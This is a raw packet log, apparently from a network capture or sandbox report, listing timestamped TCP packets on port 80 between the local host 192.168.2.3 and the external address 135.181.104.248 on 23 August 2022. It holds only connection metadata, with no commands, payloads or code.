Aug 23, 2022 03:43:01.178203106 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178205013 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178219080 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178250074 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178258896 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178277016 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178296089 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178339005 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178361893 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178383112 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178396940 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178401947 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178416014 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178450108 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178459883 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178472042 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178503036 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178502083 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178517103 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178554058 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178576946 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178597927 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178617954 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178637028 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178653955 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178679943 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178704977 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178802013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178822994 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178842068 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178860903 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178860903 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178878069 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178881884 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178890944 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178904057 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178920031 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178927898 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178936958 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178946018 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178958893 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.178971052 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.178982973 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.179002047 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.179075003 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.191293955 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.192219973 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.192266941 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.192305088 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.192317963 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.192346096 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.192347050 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.192390919 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.192404032 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.192413092 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.192430019 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.192470074 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.192492008 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.192501068 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.192509890 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.192557096 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.192564011 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.192573071 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.192599058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.192637920 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.192655087 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.192663908 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.192679882 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.192720890 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.192738056 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.192745924 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.192933083 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193048954 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193092108 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193135977 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193176031 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193193913 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193205118 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193216085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193254948 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193268061 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193275928 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193295002 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193315029 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193336010 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193377018 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193384886 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193417072 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193418026 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193428993 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193458080 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193469048 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193499088 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193531990 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193537951 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193541050 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193738937 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193779945 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193813086 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193819046 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193861008 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193900108 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193924904 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193933964 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193942070 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.193955898 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.193984985 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194004059 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194026947 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194068909 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194086075 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194094896 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194111109 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194149971 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194164038 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194171906 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194190979 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194231033 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194242954 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194255114 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194272995 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194314003 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194323063 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194333076 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194353104 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194391966 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194405079 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194416046 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194432974 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194483995 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194493055 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194504023 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194545031 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194586039 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194621086 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194628000 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194636106 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194658041 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194679976 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194694042 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194720984 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194772005 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194777012 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194783926 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194823980 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194830894 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194865942 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194892883 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.194905996 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194945097 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194984913 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.194992065 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195002079 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195025921 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195065975 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195065975 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195075989 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195110083 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195112944 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195148945 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195190907 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195202112 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195211887 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195231915 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195271015 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195278883 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195311069 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195317030 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195326090 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195382118 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195422888 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195442915 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195452929 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195463896 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195506096 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195508957 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195518017 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195547104 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195553064 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195591927 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195631027 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195633888 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195669889 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195709944 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195715904 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195725918 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195751905 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195791006 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195796967 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195806026 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195837021 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195877075 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195883036 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195893049 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195918083 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195923090 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195959091 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.195964098 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.195997953 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196038008 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196042061 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.196050882 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.196079016 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196119070 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196121931 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.196131945 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.196165085 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.196466923 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196535110 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.196563959 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196608067 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196649075 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196688890 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196708918 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.196722984 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.196731091 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196769953 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196800947 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.196809053 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196849108 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196870089 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.196877003 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.196892023 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196933985 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196973085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.196984053 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197012901 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197053909 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197074890 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197084904 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197093964 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197134018 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197170019 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197174072 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197180033 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197186947 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197216034 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197257996 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197269917 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197280884 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197299004 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197340965 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197361946 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197372913 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197381973 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197422028 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197463036 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197484970 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197496891 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197501898 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197510958 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197524071 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197546005 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197571993 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197592974 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197628021 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197632074 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197638035 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197674036 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197695971 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197715998 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197755098 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197767973 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197777033 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197796106 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197818041 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197837114 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197876930 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197917938 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197947979 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197956085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.197998047 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.197998047 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198043108 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198081017 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198091030 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198101044 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198122025 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198162079 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198182106 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198190928 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198203087 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198230982 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198245049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198286057 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198299885 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198309898 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198324919 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198364019 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198402882 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198407888 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198419094 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198442936 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198458910 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198468924 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198484898 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198525906 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198570013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198586941 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198599100 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198610067 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198651075 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198672056 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198682070 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198693037 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198734045 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198756933 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198764086 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198776007 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198817968 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198849916 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198858976 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198860884 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198901892 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198915005 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.198940992 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.198982954 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199009895 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199021101 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199022055 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199031115 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199063063 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199103117 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199116945 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199125051 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199150085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199193954 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199224949 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199234009 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199240923 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199249029 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199273109 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199292898 CEST	49812	80	192.168.2.3	135.181.104.248
